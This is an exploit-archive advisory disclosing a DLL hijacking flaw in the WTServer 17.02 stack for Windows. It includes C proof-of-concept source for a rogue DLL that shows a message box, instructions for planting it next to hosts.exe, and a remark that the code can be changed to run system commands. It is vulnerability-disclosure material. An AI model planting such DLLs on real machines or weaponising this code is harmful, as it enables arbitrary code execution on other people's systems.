Home / os / winmobile

WTServer 17.02 DLL Hijacking

Posted on 10 March 2017

[+] Title: WTServer-17.02 - DLL Loading Arbitrary Code Execution
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: wassline@gmail.com
[+] Author Company: Henceforth

Vendor:
===============

http://wtserver.wtriple.com/

Download:
===========

https://sourceforge.net/projects/wtnmp/files/latest/download?source=directory

About Product:
===============

WTServer - Nginx MariaDB Redis Php development stack for Windows

A lightweight, fast and stable server stack for developing php mysql applications on windows, based on the excellent webserver Nginx. A lighter alternative to XAMPP and WAMP.

Package contains:
- Nginx 1.11.10 web server
- MariaDB 10.1.21 database server, mysql replacement (32/64bit)
- Redis 3.2 Cache/NoSql, memcached alternative (64bit)
- Php 5.6.30 & PHP 7.0.16 & PHP 7.1.2 scripting language (32/64bit)
- WinSCP SFTP client
- HTTPS using free LetsEncrypt certificates
- Composer dependency manager for php
- Adminer web based database manager
- Reg.php regular expressions tester
- WTServer Manager (32/64bit), formerly known as *wt-nmp*

Vulnerability Type:
===================

DLL Loading Arbitrary Code Execution.

Informations:
===================

The "hosts.exe" program is the vulnerable in WTServer and the vulnerable DLL is "api-ms-win-appmodel-runtime-l1-1-0.dll".

POC:
===================
Download the POC from github and compile it with "CodeBlocks" or "GCC" .

https://gist.github.com/Nassim-Asrir/8f9a97919e84c4cddc491b317672172b

Data:

// Compile this code and rename it to "api-ms-win-appmodel-runtime-l1-1-0.dll" then copy it to "C:WTServerinHostsEditor" then launch "hosts.exe"
// For any informations contact me at: wassline@gmail.com

#include "main.h"

#include <windows.h>
#define DllExport __declspec (dllexport)
int mes()
{
MessageBox(0, "DLL Hijacking Vulnerable", "Nassim Asrir", MB_OK);
return 0;
}
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{mes();}

- Download the POC and compile it and copy it to "C:WTServerinHostsEditor" then launch "hosts.exe" and you will see the MessageBox or you can modify in the code to launch a System Command (calc or ....) .

CVE Reference:
===============

N/A

Tested on:
===============

Windows 7

Win xp

 

TOP

Malware :

Exploits :